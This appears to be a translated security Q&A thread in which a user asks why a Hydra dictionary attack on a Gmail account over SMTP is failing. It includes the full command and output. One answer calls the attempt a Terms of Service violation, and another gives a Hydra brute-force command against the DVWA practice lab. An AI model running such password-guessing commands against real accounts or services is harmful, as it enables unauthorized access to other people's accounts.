Sto cercando di attaccare il dizionario sul mio account gmail con hydra su smtp

Naviga le tue risposte
2

Sto cercando di entrare nel mio account GWN personale. Ma non sta funzionando. Qualcuno ha qualche idea? C'è qualcosa che posso fare per isolare ulteriormente il problema? Sto eseguendo Kali 2016.1 su una scatola virtuale. Sono cablato direttamente al mio modem con la modalità NAT attivata in VB. Ecco cosa ho provato di seguito.

EDIT: ho anche cambiato il flag -t a 1. Potrebbe non esserti piaciuto avere 4 richieste alla volta. Stessi risultati più o meno. 

hydra -l ********@gmail.com -P passwords.txt -s 465 -S -v -V -t 4 smtp.gmail.com smtp

Ora ecco i risultati. 

Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-08-10 16:21:32
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[WARNING] Google Mail has bruteforce detection and sends false positives. You are not doing anything illegal right?!
[DATA] max 4 tasks per 1 server, overall 64 tasks, 4 login tries (l:1/p:4), ~0 tries per task
[DATA] attacking service smtp on port 465 with SSL
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target smtp.gmail.com - login "********@gmail.com" - pass "aaaa" - 1 of 4 [child 0]
[ATTEMPT] target smtp.gmail.com - login "********@gmail.com" - pass "*******************" - 2 of 4 [child 1]
[ATTEMPT] target smtp.gmail.com - login "********@gmail.com" - pass "jkjh" - 3 of 4 [child 2]
[ATTEMPT] target smtp.gmail.com - login "********@gmail.com" - pass "" - 4 of 4 [child 3]
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[STATUS] attack finished for smtp.gmail.com (waiting for children to complete tests)
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-08-10 16:21:33
    
posta user21303 11.08.2016 - 06:07
fonte

2 risposte

4

Quello che stai facendo è una violazione dei Termini di servizio di Gmail . Testo applicabile:

Don’t misuse our Services. For example, don’t interfere with our Services or try to access them using a method other than the interface and the instructions that we provide. You may use our Services only as permitted by law, including applicable export and re-export control laws and regulations. We may suspend or stop providing our Services to you if you do not comply with our terms or policies or if we are investigating suspected misconduct.

Non stai hackerando "il tuo account". In questo caso, stai tentando di aggirare il sistema di autenticazione di GMail, un servizio che sicuramente non ti appartiene. Questo è nel migliore dei casi una violazione di ToS e, nel peggiore dei casi, illegale.

    
risposta data 11.08.2016 - 06:41
fonte
3

Scarica l'applicazione Web dannatamente vulnerabile all'indirizzo questo sito

È fantastico e gratuito, puoi provare a modificarlo senza conseguenze. Buona fortuna

Leggi anche su questo e < a href="http://blog.pusheax.com/2014/01/dictionary-and-brute-force-attack-using.html"> questo

Uso questo tipo di comando 

hydra 192.168.88.4 -l admin -P C:\Hydra\List\Passwords_million_password_list_top_1000000.txt http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security;low;PHPSESSID=Paste ID here"

Questa è una linea di esempio dell'hack del sito DVWA.

    
risposta data 25.08.2016 - 16:37
fonte

Leggi altre domande sui tag

Che cosa è un certificato SSL destinato a dimostrare e come lo fa? Il problema di Huddle era solo un "bug" nell'implementazione della vera autenticazione a due fattori?